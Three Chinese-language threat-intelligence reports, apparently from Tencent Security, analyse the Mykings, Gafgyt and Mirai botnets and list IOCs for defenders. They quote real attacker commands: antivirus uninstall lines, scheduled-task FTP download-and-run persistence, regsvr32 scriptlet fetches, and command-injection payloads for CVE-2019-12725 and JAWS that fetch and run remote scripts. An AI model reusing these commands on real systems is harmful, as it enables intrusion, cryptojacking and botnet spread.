Mykings 僵尸网络新变种通过 PcShare 远程控制,已感染超 5 万台电脑挖矿
感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/wZvnq6gVnEdGSH6f6oG8MA 最新版Mykings会在被感染系统安装开源远程控制木马PcShare,对受害电脑进行远程控制。Mykings僵尸网络木马还会关闭Windows Defender、检测卸载常见杀毒软件;卸载竞品挖矿木马和旧版挖矿木马;下载“暗云”木马感染硬盘主引导记录(MBR)实现长期驻留;通过计划任务、添加启动项等实现开机自动运行等行为。 一、背景 腾讯安全威胁情报中心检测到Mykings挖矿僵尸网络变种木马,更新后的Mykings会在被感染系统安装开源远程控制木马PcShare,对受害电脑进行远程控制:可进行操作文件、服务、注册表、进程、窗口等多种资源,并且可以下载和执行指定的程序。 Mykings僵尸网络木马还会关闭Windows Defender、检测卸载常见杀毒软件;卸载竞品挖矿木马和旧版挖矿木马;下载“暗云”木马感染硬盘主引导记录(MBR)实现长期驻留;通过计划任务、添加启动项等实现开机自动运行等行为。 MyKings僵尸网络最早于2017年2月左右开始出现,该僵尸网络通过扫描互联网上 1433 及其他多个端口渗透进入受害者主机,然后传播包括DDoS、Proxy(代理服务)、RAT(远程控制木马)、Miner(挖矿木马)、暗云III在内的多种不同用途的恶意代码。由于MyKings僵尸网络主动扩散的能力较强,影响范围较广,对企业用户危害严重。根据门罗币钱包算力1000KH/s进行推测,Mykings僵尸网络目前已控制超过5万台电脑进行挖矿作业。 腾讯安全系列产品已支持检测、清除Mykings僵尸网络的最新变种,具体响应清单如下: 应用场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)Mykings僵尸网络相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)Mykings僵尸网络相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1) Mykings僵尸网络关联的IOCs已支持识别检测; 2) 通过协议特征检测主机挖矿行为; 3) SQL Server弱口令爆破登陆行为检测; 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec 主机安全 (Cloud Workload Protection,CWP) 1) 已支持查杀Mykings僵尸网络相关木马程序; 2) 云主机SQL Server弱口令风险项检测; 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 1) 已支持通过协议检测Mykings僵尸网络与服务器的网络通信; 2) 通过协议特征检测主机挖矿行为; 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统(御点) 1)可查杀Mykings僵尸网络入侵释放的木马程序; 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html 二、样本分析 mykings通过mssql爆破(1433端口)攻击windows服务器,爆破登陆成功后执行Powershell脚本power.txt。Power.txt首先关闭Windows Defender相关功能,然后下载kill.txt清除旧版挖矿程序。 Kill.txt根据进程名匹配旧版挖矿程序,其中标记为“1”代表清除对应的WMI启动项,列表中Mykings常用进程名包括: uihost64.exe、dhelper.exe、msinfo.exe、u.exe、lsmose.exe、lsmos.exe、lsmo.exe、csrw.exe、csrw.exe、lsmosee.exe、lsmma.exe、lsmm.exe、lsmmaa.exe、lsmma.exe、new.exe、upsupx.exe、lsma.exe、lsmab.exe、lsmaaa.exe、lsma30.exe、lsma31.exe 删除旧版WMI事件过滤器“fuckyoumm2_filter”、消费者“fuckyoumm2_consumer”,从而删除WMI启动项。 2.1持久化 Power.txt接着下载uninstall.txt执行,完成卸载杀软、删除旧版挖矿木马、以及通过安装Windows计划任务、RUN启动项、WMI启动项进行本地持久化操作。 1、 卸载指定杀毒软件; wmic.exe product where “name like ‘%Eset%'” call uninstall /nointeractive wmic.exe product where “name like ‘%%Kaspersky%%'” call uninstall /nointeractive wmic.exe product where “name like ‘%avast%'” call uninstall /nointeractive wmic.exe product where “name like ‘%avp%'” call uninstall /nointeractive wmic.exe product where “name like ‘%Security%'” call uninstall /nointeractive wmic.exe product where “name like ‘%AntiVirus%'” call uninstall /nointeractive wmic.exe product where “name like ‘%Norton Security%'” call uninstall /nointeractive cmd /c “C:\Progra 1\Malwarebytes\Anti-Malware\unins000.exe” /verysilent /suppressmsgboxes /norestart 2、安装计划任务“oka”启动新版挖矿木马lsma12.exe,杀死进程java.exe; schtasks /create /tn “oka” /tr “cmd /c start c:\windows\inf\aspnet\lsma12.exe -p” /ru “system” /sc onstart /F wmic.exe process where ExecutablePath=’c:\\windows\\java\\java.exe’ call Terminate 3、安装计划任务”Mysa”、”Mysa2″,在每次系统启动时执行命令,使用账号test密码1433登陆FTP服务器ftp[.]ftp0930[.]host下载木马a1.exe和s1.rar并执行; schtasks /create /tn “Mysa” /tr “cmd /c echo open ftp.ftp0930.host >s echo test>>s echo 1433>>s echo binary>>s echo get a1.exe c:\windows\update.exe>>s echo bye>>s ftp -s:s c:\windows\update.exe” /ru “system” /sc onstart /F schtasks /create /tn “Mysa2” /tr “cmd /c echo open ftp.ftp0930.host>ps echo test>>ps echo 1433>>ps echo get s1.rar c:\windows\help\lsmosee.exe>>ps echo bye>>ps ftp -s:ps c:\windows\help\lsmosee.exe” /ru “system” /sc onstart /F 4、设置拒绝“system”用户访问指定文件和路径; cacls c:\windows\java\java.exe /e /d system cacls c:\windows\temp\servtestdos.dll /e /d system cacls C:\WINDOWS\Fonts\cd /e /d system 5、安装RUN启动项“start”负责下载执行脚本v1.sct,同时删除旧启动项“start1”,删除旧计划任务“Mysa3”、“ok”、“Mysa1”、“my1”。 reg add “HKLM\Software\Microsoft\Windows\CurrentVersion\Run” /v “start” /d “regsvr32 /u /s /i:http[:]//js.down0116.info:280/v1.sct scrobj.dll” /f reg add “HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run” /v “start” /d “regsvr32 /u /s /i:http[:]//js.down0116.info:280/v1.sct scrobj.dll” /f reg delete HKlm\Software\Microsoft\Windows\CurrentVersion\Run /v “start1” /f SCHTASKS /Delete /TN “Mysa3” /F SCHTASKS /Delete /TN “ok” /F SCHTASKS /Delete /TN “Mysa1” /F SCHTASKS /Delete /TN “my1” /F 6、继续删除旧版的名称为“coronav”(新冠)的WMI启动项,同时安装新版的“coronav”WMI启动项,在其中通过Powershell下载和执行以下脚本: http[:]//ruisgood.ru/power.txt http[:]//gamesoxalic.com/power.txt 或者通过regsvr32下载和执行脚本: http[:]//ruisgood.ru/s.txt http[:]//gamesoxalic.com/s.txt 7、安装WMI启动项“fuckamm3”、“fuckamm4”启动新版挖矿木马程序: 8、Download.txt负责下载门罗币挖矿程序、Mykings更新程序和安装“暗云”木马感染程序: 2.2自更新 Download.txt下载的ups.dat为自解压程序,解压后释放多个文件到temp目录下,执行竞品挖矿木马清除、挖矿木马下载和启动,以及安装启动项等更新操作。释放的文件包括: c:\windows\temp\ntuser.dat c:\windows\temp\upx.exe %temp%\c3.bat %temp%\excludes %temp%\n.vbs Download.txt 下载的“暗云”木马max.rar会感染MBR执行shellcode,从云端获取Payload并最终获取Mykings相关木马文件。下载Payload网络流量如下: 首先从C2服务器http[:]//95.214.9.95/pld/cmd.txt下载cmd.txt。 然后向服务器(http[:]//95.214.9.95/pld/login.aspx?uid=***&info=***)发送上线信息,参数包括设备标识号uid和info,其中info包括计算机名、出口IP、CPU型号、CPU数量、内存大小信息,info数据经过base64编码,服务器接收数据后返回“AcceptOK”。 2.3 PcShare远控木马 返回数据cmd.txt中指定下载的20200809.rar为PcShare开源远控木马,该木马在github上有多个版本https[:]//github.com/LiveMirror/pcshare。木马下载后被拷贝至: c:\windows\debug\item.dat,启动命令为: rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa。 PcShare可根据服务端指令执行以下多种远控功能,该木马源代码在多个共享平台可供下载,黑客可以随意下载和重新修改编译。 1.枚举、创建、重命名、删除文件和目录 2.枚举和终止进程 3.编辑注册表项和值 4.枚举和修改服务 5.枚举和控制窗口 6.执行二进制文件 7.从C&C或提供的URL下载其他文件 8.将文件上传到C&C 9.执行shell命令 10.显示消息框 11.重新启动或关闭系统 PcShare连接C2服务器:192.187.111.66:5566。 2.4挖矿 Download.txt从地址http[:]//ruisgood.ru/1201.rar下载得到XMRig挖矿程序,从地址http[:]//ruisgood.ru/config2.json下载得到挖矿配置文件,然后启动挖矿进程: c:\windows\inf\aspnet\lsma12.exe 挖矿时使用矿池:xmr-eu1.nanopool.org:14444 门罗币钱包: 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQo6GYsXhWxuSrS7Uka 查询该钱包,已挖矿获得143个XMR,折合人民币8万余元。而其矿池算力平均为1000Kh/s(盈利100美元/天),可推算约5万台电脑被控制挖矿。 IOCs C&C 192.187.111.66:5566 95.214.9.95 Domain ruisgood.ru ftp.ftp0801.ru gamesoxalic.com ftp.ftp0930.host js.down0116.info js.mys2016.info wmi.1217bye.host js.5b6b7b.ru up.mykings.pw kriso.ru f321y.com down.f4321y.com IP 199.168.100.74 173.247.239.186 174.128.235.243 223.25.247.152 167.88.180.175 139.5.177.10 173.247.239.186 185.239.227.82 URL http[:]//ruisgood.ru/ups.dat http[:]//ruisgood.ru/power.txt http[:]//ruisgood.ru/1201.rar http[:]//ruisgood.ru/uninstall.txt http[:]//ruisgood.ru/max.rar http[:]//ruisgood.ru/config2.json http[:]//ruisgood.ru/s.txt http[:]//ruisgood.ru/upx.exe http[:]//ruisgood.ru/s.xsl http[:]//ruisgood.ru/download2.txt http[:]//ruisgood.ru/batpower.txt http[:]//ruisgood.ru/ups.dat http[:]//ruisgood.ru/download.txt http[:]//ruisgood.ru/kill.txt http[:]//ruisgood.ru/up.txt http[:]//ruisgood.ru/wmi.txt http[:]//ruisgood.ru/batpower.tx http[:]//ruisgood.ru/up2.txt http[:]//gamesoxalic.com/power.txt http[:]//gamesoxalic.com/s.txt ftp[:]//199.168.100.74/aa.exe ftp[:]//199.168.100.74/1.dat ftp[:]//ftp.ftp0801.ru/1.dat ftp[:]//ftp.ftp0801.ru/aa.exe ftp[:]//ftp.ftp0930.host/a1.exe ftp[:]//ftp.ftp0930.host/s1.rar http[:]//js.down0116.info:280/v1.sct http[:]//174.128.235.243/wmi.txt http[:]//174.128.235.243/upsupx2.exe http[:]//174.128.235.243/u.exe http[:]//199.168.100.74/20200809.rar http[:]//199.168.100.74:8074/1201.rar http[:]//173.247.239.186:9999/max.exe http[:]//173.247.239.186:9999/u.exe http[:]//185.239.227.82:8082/2.exe http[:]//wmi.1217bye.host/S.ps1 http[:]//95.214.9.95/pld/cmd.txt http[:]//223.25.247.152:8152/batpower.txt http[:]//167.88.180.175:8175/kill.txt http[:]//167.88.180.175:8175/uninstall.txt http[:]//139.5.177.10:280/psa.jpg http[:]//199.168.100.74/2.exe http[:]//199.168.100.74:8074/2.exe http[:]//173.247.239.186/2.exe http[:]//185.239.227.82:8082/2.exe http[:]//173.247.239.186:9999/2.exe http[:]//js.5b6b7b.ru/v.sct http[:]//js.5b6b7b.ru:280/v.sct http[:]//up.mykings.pw/update.txt http[:]//kriso.ru/java12.dat http[:]//js.ftp0930.host/helloworld.msi http[:]//f321y.com:8888/dhelper.dat http[:]//down.f4321y.com:8888/kill.html md5 20200809.rar dce4ac18798ea897cdc9e09e06b178be max.rar bc7fc83ce9762eb97dc28ed1b79a0a10 u.exe d9c32681d65c18d9955f5db42154a0f3 ups.dat d1f978c88023639d6325805eb562de8c upsupx2.exe b5cd8af63e35db23eb1c6a4eb8244c45 address.txt 83bdb3a6fb995788de262b22919524f1 cloud.txt 6b9b70f4e0c8885d12169045e906d698 cmd.txt 6def7a0c5707f24a912c79f6520ca86f kill.txt 1573ab993edc98decc09423fd82ec5ed micro f0129d85b17ee4d29ef52c63e0e548a4 power.txt 5670f0839333e4b160be05177601b40c uninstall.txt 6092899216610fea5c65e416b34c1777 update.txt 581a86fea2afeb9b9d6d04c9a8f0a5c1 wmi.txt 6afc95f60630a588a7826608c70a60c8 wpd.jpg bbae338b0cac5a2d169b8c535f33bfa0 batpower.txt 40160c782c2a41eed8d8eaf0c706050a up.txt 6c190a44db2118d9c07037d769e0a62d ups.txt f41a8a69361fccc13344493c04a4f0d8 s.ps1 966abd05b7ad1b0b89d2a846f8a5a8f2 testav.dat d4f7a3f44ae3f21863b1440219388a5b psa.jpg 9cb1c1a78ce3efe57eef5f128b43710a 门罗币钱包: 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQo6GYsXhWxuSrS7Uka 参考链接: https://www.freebuf.com/articles/193260.html https://www.freebuf.com/articles/network/161286.html https://blogs.blackberry.com/en/2019/09/pcshare-backdoor-attacks-targeting-windows-users-with-fakenarrator-malware
警惕 Gafgyt 僵尸网络对国内 Linux 服务器及 IoT 设备的攻击
感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/fUOracfMmKfj5RT2llMVpg 一、背景 腾讯安全威胁情报中心检测到有境外IP针对国内Linux服务器的远程命令注入攻击。黑客通过批量扫描80、5555、60001端口来发现易受攻击的Linux服务器、android设备以及监控摄像头设备并利用ZeroShell远程代码执行漏洞(CVE-2019-12725)、bash shell漏洞、JAWS Webserver未授权shell命令执行漏洞进行攻击,攻击成功后下载Gafgyt家族木马。 Gafgyt是一种流行的僵尸网络程序,被认为是Mirai的前身,其源代码在2015年初被部分泄露。Gafgyt主要通过telent弱口令以及命令注入漏洞等方式进行攻击传播,通过感染基于Linux的IoT设备(包括基于Linux系统的路由器、智能摄像头等设备)来发起DDoS攻击,攻击类型以UDP、TCP和HTTP攻击为主。 腾讯安全系列产品应对Gafgyt僵尸网络的响应清单: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)Gafgyt僵尸网络相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)Gafgyt僵尸网络相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1) Gafgyt僵尸网络关联的IOCs已支持识别检测; 2) 检测利用Zeroshell漏洞的命令注入攻击; 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec 主机安全 (Cloud Workload Protection,CWP) 1) 已支持查杀Gafgyt僵尸网络相关木马程序; 2) 告警弱口令爆破行为; 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 1) 已支持通过协议检测Gafgyt僵尸网络木马与服务器的网络通信; 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 二、详细分析 腾讯安全专家在日常安全巡检过程中发现攻击线索,腾讯云防火墙检测到攻击来源52.224.202.238:43787,针对目标系统80端口的命令注入攻击。 该攻击的payload为: GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*”;cd /tmp;curl -O http[:]//5.206.227.228/zero;sh zero;” HTTP/1.0 分析发现这次攻击利用的是ZeroShell远程代码执行漏洞(CVE-2019-12725),该漏洞在2019年7月被发现,攻击者可以通过构造具有固定特征的请求数据发送至目标系统,从而导致恶意代码执行。(ZeroShell是一套用于服务器和嵌入式设备的Linux发行版,它主要为局域网提供所需要的网络服务) 漏洞攻击成功后通过curl命令下载执行shell脚本zero,zero继续通过curl下载Gafgyt木马bot.x86_64和bot.x86并启动执行,分别为64位和32位木马文件。 bot.x86为Gafgyt僵尸网络家族木马样本,启动后首先打印特征字符串“9xsspnvgc8aj5pi7m28p”。 然后针对Linux服务器、android设备、视频监控设备的80、5555、60001端口进行扫描。 针对开放端口的设备利用ZeroShell远程代码执行漏洞(CVE-2019-12725)攻击,执行payload: GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*“;cd /tmp;curl -O http[:]//5.206.227.228/zero;sh zero;” 利用bash shell漏洞攻击,执行payload: shell[:]cd /data/local/tmp; busybox wget http[:]//5.206.227.228/wget -O -> wwww; sh wwww; curl -O http[:]//5.206.227.228/curl; sh curl;rm wwww curl 利用JAWS Webserver未授权shell命令执行漏洞攻击,执行Payload: GET /shell?cd /tmp;wget http[:]//5.206.227.228/jaw;sh jaw; ZeroShell远程代码执行漏洞(CVE-2019-12725)的攻击流量: IOCs IP 5.206.227.228 URL http[:]//5.206.227.228/zero http[:]//5.206.227.228/curl http[:]//5.206.227.228/wget http[:]//5.206.227.228/k http[:]//5.206.227.228/bot.x86_64 http[:]//5.206.227.228/bot.x86 http[:]//5.206.227.228/bot.arm5 http[:]//5.206.227.228/bot.arm6 http[:]//5.206.227.228/bot.arm7 http[:]//5.206.227.228/bot.aarch64 http[:]//5.206.227.228/bot.mips http[:]//5.206.227.228/bot.mipsel MD5 2520fc7d13ac3876cca580791d1c33a8 cc84fcc23567228337e45c9fbb78699f 10b9f21795e5ffbd52c407617d0bd4ef 38d8de098c7e560a34dabf8c1a2ed5f0 12b021bcd199585e86dd27523010105b 0e12d891a2fe2cecb6781f3e4d3551b4 aa389e7fb64cf274334712ecb3dfd2cd 2dabb8e039a77f0eb67e938d798ab7c4 03a7f039321ffb9938cc67d65c0b6459 a9109419954a421b712d48ea22b0a7b9 52fb891c536fe449b896f0f2cd2490d4 e2cec25584bfec1e56ee82f350dfeaf9 87859507c0d23793c78d86e0963a7a37 ba903efc3d2e37105e57232e7652b85c 891bbf7b562b34332fac12df2c29ddbb 6d9953a03c568ad97595723d1a09b291 aa9e9627ed6aba6415fb45f742f4f8dd 参考链接: https://www.anquanke.com/vul/id/1030688 https://www.tarlogic.com/advisories/zeroshell-rce-root.txt https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/ https://github.com/ifding/iot-malware
Mirai 僵尸网络利用弱口令爆破攻击上万台 Linux 服务器
感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/8yTiVyxC6_aapGhrTs1uWw 腾讯安全威胁情报中心检测到Mirai僵尸网络大规模攻击Linux服务器。攻击者针对Linux服务器的SSH(22端口)进行弱口令爆破攻击,成功登陆后执行shellcode下载shell脚本,然后通过shell脚本依次下载基于多个系统平台的Mirai僵尸网络二进制木马程序。 一、概述 腾讯安全威胁情报中心检测到Mirai僵尸网络大规模攻击Linux服务器。攻击者针对Linux服务器的SSH(22端口)进行弱口令爆破攻击,成功登陆后执行shellcode下载shell脚本,然后通过shell脚本依次下载基于多个系统平台的Mirai僵尸网络二进制木马程序。 Mirai是一个大型僵尸网络,主要通过SSH和telnet弱口令进行感染,攻击目标包括监控摄像头、路由器等物联网设备以及Linux服务器,控制机器后通过C&C服务器下发命令进行DDoS攻击。根据腾讯安全威胁情报中心监测数据,Mirai僵尸网络已在全国造成上万台设备感染,其中感染最多的为广东、上海和北京。 腾讯安全专家建议企业linux管理员避免使用弱口令,关闭非必须启用的端口,以防御黑客利用弱口令爆破的方式远程入侵,腾讯安全系列产品也针对Mirai僵尸网络的技术特点进行响应,清单如下: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)Mirai僵尸网络相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)Mirai僵尸网络相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)Mirai僵尸网络关联的IOCs已支持识别检测; 2)告警弱口令爆破行为。 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec 主机安全 (Cloud Workload Protection,CWP) 1)已支持查杀Mirai僵尸网络相关木马程序; 2)告警弱口令爆破行为。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 1)已支持通过协议检测Mirai僵尸网络木马与服务器的网络通信。 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/ 二、详细分析 攻击者通过SSH(22端口)弱口令爆破进行远程攻击,攻击成功后执行如下shellcode: cd /tmp || cd /run || cd /; wget http[:]//193.228.91.123/reportandyougaybins.sh; chmod 777 reportandyougaybins.sh; sh reportandyougaybins.sh shellcode使用wget下载shell脚本reportandyougaybins.sh到/tmp目录下并通过sh执行,reportandyougaybins.sh脚本内容如下: reportandyougaybins.sh主要功能为下载和执行二进制木马程序,会分别从以下地址下载基于多个架构体系的样本,其中i586、i686、x86可感染基于Intel处理器的Linux服务器: http[:]//193.228.91.123/mips http[:]//193.228.91.123/mipsel http[:]//193.228.91.123/sh4 http[:]//193.228.91.123/x86 http[:]//193.228.91.123/armv6l http[:]//193.228.91.123/i686 http[:]//193.228.91.123/powerpc http[:]//193.228.91.123/i586 http[:]//193.228.91.123/m68k http[:]//193.228.91.123/sparc http[:]//193.228.91.123/armv4l http[:]//193.228.91.123/armv5l 以i586为例进行分析,该样本的主要功能为与C&C地址通信,接收远程命令对目标发起DDOS攻击。在IOT设备中,通常会有看门狗(watchdog)进程,不断给看门狗进程发送发送心跳可以保持设备不重启。Mirai首先尝试发送控制码0x80045704来关闭看门狗功能,如果未成功关闭,则进入循环不断向其发送保活指令0x80045705。 将木马进程名替换为”/usr/sbin/dropbear”或者”sshd”隐藏自身。 从/proc/net/route中获取本机IP。 初始化table,并将后续要使用的数据添加到table中。 然后table_retrieve_val从table中取出数据,table_lock_val和table_unlock_val分别为加密和解密数据,解密函数在toggle_obf()中实现,解密方法是将数据与table_key进行循环异或,其中table_key=0xDEDEFFBA。 解密并连接C&C服务器194.180.224.103:3982,然后向其发送字符串解密并连接C&C服务器194.180.224.103:3982,然后向其发送字符串“arch xxx”,xxx为设备平台类型。 Mirai与C&C服务器通信TCP流: 获取C&C服务器返回的数据后,进入processCmd处理接收到的命令。 Mirai可根据命令向目标发起以下类型的DDoS攻击:”HTTP”、”CUDP”、”UDP”、”STD”、”CTCP”、”TCP”、”SYN”、”ACK”、”CXMAS”、”XMAS”、”CVSE”、”VSE”、”CNC”。 HTTP攻击: UDP攻击: TCP攻击: SYN攻击: ACK攻击: IOCs IP 193.228.91.123 194.180.224.103 45.95.168.138 45.95.168.190 37.49.224.87 193.228.91.124 185.172.110.185 C&C 194.180.224.103:3982 MD5 649a06f5159fc4e8ee269a9e0e1fd095 8bb40eb446abb7472cb3a892fd2450b4 3f3f8184219514d5834df94f362c74bc ef3b89e44a3a4973575a876ee5105cec 34033f561d196495e5c4780327acca0a 6f637a4ccfd00d9c2e08ecb84ce0b987 03ff0f5521631db7fa0d7990b5b4c19e 91c0f5304438a42ae5f28c8c0ff15954 536accde3643cb8294dd671ae5bdb3a2 9789917095d92cfe507e5fc2266667a1 8bafcd3d57dc597af4b6cb497cf0a0de 7e8e28631962dd5d52cbd93e50e7916e 7bfd106fe9d41c658f3be934346d3ff6 f0d5b7e31b4308c5ec326de9304bd3f4 bd1db394d52b950eed972eae93b80469 8b49a58a0bcb93afe72f1e3c1d800515 97a3699b819496892788b5c7a24be868 990fe40e991b9813a4f73b115ba160cb 2c0cc3d82871cfc05d38ea0a04f7f80a 26c56b011a494886e758d12fc07f6951 6e6d56669554c492ec4b1a9abd23e35b 64e5195e9cde652de6b2623d2d3e098d 1eeee50672a42dc2e55c6d4126afaf26 f6bbcf50aeda03aab1b5bc21b3df3e99 8e7d3e4bedf9bc3ed8a67890edc36590 556bd1d4d93abf19b4075d12ffef02a8 0d5302aa5491b3944566a212ca205923 ef72d6cc859438142a166f1d3ea4d462 193f92152f483aeb7ebe6d42855d9f27 1de00b44ef800a9d878de591fc43b854 b6e5bfb4b2f75d828022b84a247e99f2 039f379f3a36b4ab982a5ada7ceea078 51547b23165bc6f205ec3625840f3800 92137cf8ff782e15995919ebaa658474 94e027f4d33900f116bcf176aba726de aefe0411bd89a9b97c1741b75c9f7d71 d15256b7a475f8934daf79364b0885a1 c624ed18ad756aa6f41a70fe90102d78 5ff2fc4de3a059b504e09b7b1663ac1f fe6d19da030b1d299c35e89639d567bd 24a2659c72a980997161950926063b84 51b2190aa408ae08c6c9bf8dc8acc6e0 ecd696438914cc3c60dbf6de0df48f87 b45af2197eb3d12a199a40a048a36db6 32ef86b0358793f7ceffe1822bbf70e1 60fd7ed2e1ad0d41875d761b899766c4 0970f7f309bc678b0117d600e3f80f5f a1dc1c62dba56af6a8b25767074d691d 1cca73d23c7e50f4111815e840bd8960 42c87649e776dd73aa06033f9b8b750e 08dc3f3c77161e1cc349d91263f76b8c 61915eb8d8742fea42d3683c7255945a 000466d4c6c06398042851a7c049f6b6 0be41e0b52c51ab4ad966513455550b1 6290db15f07f6ebb114824b912a10129 fe19b99077ef4fe492107e4a9b943094 9068c1c69ab5c6ba80f01bab1a1a2ad4 8bb40eb446abb7472cb3a892fd2450b4 2b8796693b5f578c40611e5221fb4788 9f71d8839d89f7bed716bb3f509eb22f 47f12cf0806d2875c592a7d15e266ee6 8ee73860cfe02ca529671c060c18cf00 9e91347c4d8afad598d21e446f967fb2 71d2dc0728e710e4f939c97e88929930 672380fd4c58302e1c48a45e75c580d7 143f7de27921db16b08cea70bb3bef7b 63db9805775b20dae4c0f06e03585446 4a751ef5ef5e48cfef33bd29e2a4a5b7 00bf4ee5a64971260683e047719c0dd8 028b7629ff410f429ba65db1f6779226 URL http[:]//193.228.91.123/ares.sh http[:]//193.228.91.123/arm7 http[:]//193.228.91.123/armv6l http[:]//193.228.91.123/i686 http[:]//193.228.91.123/33bi/Ares.ppc http[:]//193.228.91.123/33bi/Ares.arm6 http[:]//193.228.91.123/33bi/ares.armebv7 http[:]//193.228.91.123/33bi/ares.mips http[:]//193.228.91.123/33bi/Ares.m68k http[:]//193.228.91.123/33bi/ares.mpsl http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.ppc http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.m68k http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.spc http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.i686 http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.sh4 http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.arc http[:]//193.228.91.123/FuckBitchBastardDamnCuntJesusHaroldChristbins.sh http[:]//193.228.91.123/reportandyougaybins.sh http[:]//193.228.91.123/mips http[:]//193.228.91.123/mipsel http[:]//193.228.91.123/sh4 http[:]//193.228.91.123/x86 http[:]//193.228.91.123/armv6l http[:]//193.228.91.123/i686 http[:]//193.228.91.123/powerp http[:]//193.228.91.123/i586 http[:]//193.228.91.123/m68k http[:]//193.228.91.123/sparc http[:]//193.228.91.123/armv4l http[:]//193.228.91.123/armv5l http[:]//194.180.224.103/mips http[:]//194.180.224.103/mipsel http[:]//194.180.224.103/sh4 http[:]//194.180.224.103/x86 http[:]//194.180.224.103/armv6l http[:]//194.180.224.103/i686 http[:]//194.180.224.103/powerpc http[:]//194.180.224.103/i586 http[:]//194.180.224.103/m68k http[:]//194.180.224.103/sparc http[:]//194.180.224.103/armv4l http[:]//194.180.224.103/armv5l 参考链接: https://www.freebuf.com/articles/terminal/117927.html http://blog.nsfocus.net/mirai-source-analysis-report/
